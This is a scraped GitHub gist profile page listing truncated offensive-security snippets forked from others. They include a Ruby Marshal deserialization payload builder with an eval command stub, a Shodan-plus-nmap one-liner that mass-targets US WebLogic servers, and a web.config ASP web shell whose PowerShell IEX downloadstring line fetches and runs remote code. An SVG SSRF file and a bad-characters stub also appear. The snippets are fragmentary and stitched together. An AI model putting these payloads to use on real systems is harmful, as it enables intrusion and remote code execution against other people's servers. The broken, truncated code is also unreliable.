Skip to content

Instantly share code, notes, and snippets.

View Splint3r7's full-sized avatar

Splint3r7 Splint3r7

View GitHub Profile
Splint3r7 / ssrf_iframe.svg
Created April 5, 2019 09:34 — forked from akhil-reni/ssrf_iframe.svg
SVG Foreign Objects IFrame SSRF
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
code = "eval('`COMMAND HERE`')"
marshal_payload = Base64.encode64(
"\x04\x08" +
"o" +
Splint3r7 / gist:21318469ccb629d972586ca1ab8c21ad
Created April 18, 2019 06:31 — forked from Viss/gist:e7c735ed389c8d055e6f31e845f25516
bash one liner for extracting shodan results for weblogic.
# this script was written by viss as a challenge from @random_robbie
# This one-liner replaces a fairly lengthy python script
# if you want to be walked through it, sign up for square cash, send $viss 20 dollars. Otherwise, flex your google fu!
# oh, ps: you need to pip install shodan, and then configure the shodan cli client by giving it your api key.
# then you're off to the races.
shodan search --fields ip_str --limit 1000 'product:"Oracle Weblogic" port:"7001" country:"US"' | sort -u | nmap -sT -Pn -n -oG - -iL - -p 7001 | grep open | awk '{print $2}' | xargs -I % -n 1 -P 30 bash -c 'RESULT=`curl -s -I -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko0100101 Firefox/54.0" -H "Connection":"close" -H "Accept-Language":"en-US -H en;q=0.5" -H "Accept":"text/html -H application/xhtml+xml -H application/xml;q=0.9 -H */*;q=0.8" -H "Upgrade-Insecure-Requests":"1" %:7001/ws_utc/ | egrep HTTP`; echo "%: $RESULT";'
Splint3r7 / content_discovery_all.txt
Created May 5, 2019 11:00 — forked from jhaddix/content_discovery_all.txt
a masterlist of content discovery URLs and files (used most commonly with gobuster)
This file has been truncated, but you can view the full file.
echo "<title>Generated hyper Link URLS</title>" >> $1-urls.html
cat $1 | while read urls; do
echo "<a href=${urls}>${urls}</a></br></br>" >> $1-urls.html
<?xml version="1.0" encoding="UTF-8"?>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
<remove fileExtension=".config" />
//simple aspx shell to execute commands
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('')")
o = cmd.StdOut.Readall()
Splint3r7 / ruby-open-uri-request.rb
Created July 30, 2019 13:44 — forked from SabretWoW/ruby-open-uri-request.rb
4-line Ruby script that uses open-uri to fetch the contents of a URL & displays it in the console. This is the foundation for all web requests, whether to scrape a page, request a JSON response, and more.
require 'open-uri'
# Go fetch the contents of a URL & store them as a String
response = open('').read
# "Pretty prints" the result to look like a web page instead of one long string of HTML
# Print the contents of the website to the console
old_pr=$(ps -eo command)
while true; do
new_pr=$(ps -eo command)
diff <(echo "$old_pr") <(echo "$new_pr") | grep [\<\>]
sleep 1
Splint3r7 / badchars
Last active November 1, 2019 19:51
badchars = (